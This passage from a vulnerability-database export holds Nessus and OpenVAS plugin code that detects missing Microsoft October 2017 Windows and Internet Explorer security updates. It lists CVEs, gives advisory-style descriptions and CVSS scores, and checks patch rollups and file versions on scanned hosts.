by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. 
The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. 
(CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. 
(CVE-2017-11779)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4041690/windows-server-2012-update-kb4041690\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e258896f\");\n # https://support.microsoft.com/en-us/help/4041679/windows-server-2012-update-kb4041679\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14f62d6a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4041690 or KB4041679.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041690', '4041679');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041690, 4041679])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:15", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041678\nor cumulative update 4041681. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. 
(CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. 
An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_4041681.NASL", "href": "https://www.tenable.com/plugins/nessus/103746", "published": "2017-10-10T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103746);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11819\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101147,\n 101149,\n 101161,\n 101162,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041681\");\n 
script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041678\");\n script_xref(name:\"MSFT\", value:\"MS17-4041681\");\n script_xref(name:\"MSFT\", value:\"MS17-4041678\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041678\nor cumulative update 4041681. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. 
An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. 
The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4041681/windows-7-update-kb4041681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d1a2595\");\n # https://support.microsoft.com/en-us/help/4041678/windows-7-update-kb4041678\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?501fabf5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4041678 or Cumulative update KB4041681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041681', '4041678');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n 
smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041681, 4041678])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4040685.", "modified": "2019-05-20T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310811934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811934", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811934\");\n script_version(\"2019-05-20T11:12:48+0000\");\n script_cve_id(\"CVE-2017-11790\", \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11813\",\n \"CVE-2017-11822\");\n script_bugtraq_id(101077, 101141, 101081, 101083, 101122);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-20 11:12:48 +0000 (Mon, 20 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 11:55:08 +0530 (Wed, 11 Oct 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4040685.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Internet Explorer improperly accesses objects in memory.\n\n - The way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - Internet Explorer improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code in the context of the current user, gain access to\n potentially sensitive information, spoof content or serve as a pivot and detect\n specific files on the user's computer.\");\n\n 
script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x,\n 10.x and 11.x\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040685\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2, win2012:1, win2012R2:1,\n win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|1[01])\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21061\")){\n Vulnerable_range = \"Less than 9.0.8112.21061\";\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"10.0.9200.22277\")){\n Vulnerable_range = \"Less than 10.0.9200.22277\";\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"11.0.9600.18817\")){\n Vulnerable_range = \"Less than 11.0.9600.18817\";\n }\n}\n\nif(Vulnerable_range)\n{\n report = 'File checked: ' + iePath + \"\\Mshtml.dll\" + '\\n' +\n 'File version: ' + iedllVer + 
'\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041690", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310811927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811927", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
